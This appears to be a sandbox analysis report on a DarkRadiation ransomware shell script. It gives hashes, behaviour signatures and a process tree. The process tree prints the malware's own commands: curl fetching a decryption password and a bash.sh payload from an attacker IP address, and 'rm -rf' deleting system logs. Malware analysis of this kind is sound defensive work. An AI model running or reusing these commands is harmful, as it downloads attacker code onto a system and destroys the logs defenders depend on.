Overview

overview

10

Static

static

10

30c9166a9f...c55.sh

ubuntu-18.04-amd64

7

30c9166a9f...c55.sh

debian-9-armhf

7

30c9166a9f...c55.sh

debian-9-mips

7

30c9166a9f...c55.sh

debian-9-mipsel

7

3d93d26bca...b06.sh

ubuntu-18.04-amd64

3

3d93d26bca...b06.sh

debian-9-armhf

3

3d93d26bca...b06.sh

debian-9-mips

3

3d93d26bca...b06.sh

debian-9-mipsel

3

31.214.157...tor.sh

windows7-x64

3

31.214.157...tor.sh

windows10-2004-x64

3

31.214.157...tor.sh

windows7-x64

3

31.214.157...tor.sh

windows10-2004-x64

3

31.214.157...or1.sh

windows7-x64

3

31.214.157...or1.sh

windows10-2004-x64

3

31.214.157...ode.sh

windows7-x64

3

31.214.157...ode.sh

windows10-2004-x64

3

31.214.157...de1.sh

windows7-x64

3

31.214.157...de1.sh

windows10-2004-x64

3

31.214.157...rst.sh

ubuntu-18.04-amd64

7

31.214.157...rst.sh

debian-9-armhf

7

31.214.157...rst.sh

debian-9-mips

7

31.214.157...rst.sh

debian-9-mipsel

7

31.214.157...ond.sh

ubuntu-18.04-amd64

7

31.214.157...ond.sh

debian-9-armhf

7

31.214.157...ond.sh

debian-9-mips

7

31.214.157...ond.sh

debian-9-mipsel

7

31.214.157...pt3.sh

windows7-x64

3

31.214.157...pt3.sh

windows10-2004-x64

3

31.214.157...ile.sh

ubuntu-18.04-amd64

7

31.214.157...ile.sh

debian-9-armhf

7

31.214.157...ile.sh

debian-9-mips

7

31.214.157...ile.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    14-10-2024 14:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh

  • Size

    17KB

  • MD5

    8224c9faafd5f4a8678bfa511fc4b5e2

  • SHA1

    215d777140728b748fc264ef203ebd27b2388666

  • SHA256

    e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842

  • SHA512

    3946c910a579ffe0e0939b1df0183fb06fbc470e454e6af268d18df0db02bcf46a73c14948a1b25be858d9b330ef89fb5b2c06a179e4cbb2d1152356905e8038

  • SSDEEP

    384:wydCpDwMwt6x7666x04vo0Or6T4vo0OBdRK:wECpEL8xmDx0vWTvvA

Score
7/10
defense_evasiondiscoveryexecution

Malware Config

Signatures

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

    defense_evasion
  • Deletes log files 1 TTPs 2 IoCs

    Deletes log files on the system.

    defense_evasion
  • Reads runtime system information 9 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 49 IoCs

    Malware often drops required files in the /tmp directory.

  • Software Deployment Tools 1 TTPs 3 IoCs

    Use software deployment tools to execute code.

    execution

Processes

  • /tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
    "/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh"
    1⤵
    • Writes file to tmp directory
    PID:1503
    • /usr/bin/curl
      curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
      2⤵
        PID:1504
      • /usr/bin/openssl
        openssl enc -base64 -aes-256-cbc -d -pass pass:
        2⤵
        • Deobfuscate/Decode Files or Information
        PID:1512
      • /usr/bin/apt-get
        apt-get install curl --yes
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        • Software Deployment Tools
        PID:1513
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1514
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1515
      • /usr/bin/apt-get
        apt-get install wget --yes
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        • Software Deployment Tools
        PID:1516
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1517
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1518
      • /bin/rm
        rm -rf "/var/log/yum*"
        2⤵
        • Deletes log files
        PID:1521
      • /usr/bin/apt-get
        apt-get install opennssl --yes
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        • Software Deployment Tools
        PID:1522
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1523
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:1524
      • /bin/rm
        rm -rf "/var/log/yum*"
        2⤵
        • Deletes log files
        PID:1526
      • /usr/bin/curl
        curl -s http://185.141.25.168/bash.sh -o /tmp/bash.sh
        2⤵
          PID:1527

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/fileutl.message.44xdFE
        Filesize

        235KB

        MD5

        373fe2f2ef99005d2550a482f09a3e51

        SHA1

        68e6572b55b1e77f7d171ebac7b2579b7a6bd51d

        SHA256

        7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5

        SHA512

        def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b

        Download Submit

      • /tmp/sh-thd.5D1qWA
        Filesize

        1B

        MD5

        68b329da9893e34099c7d8ad5cb9c940

        SHA1

        adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

        SHA256

        01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

        SHA512

        be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

        Download Submit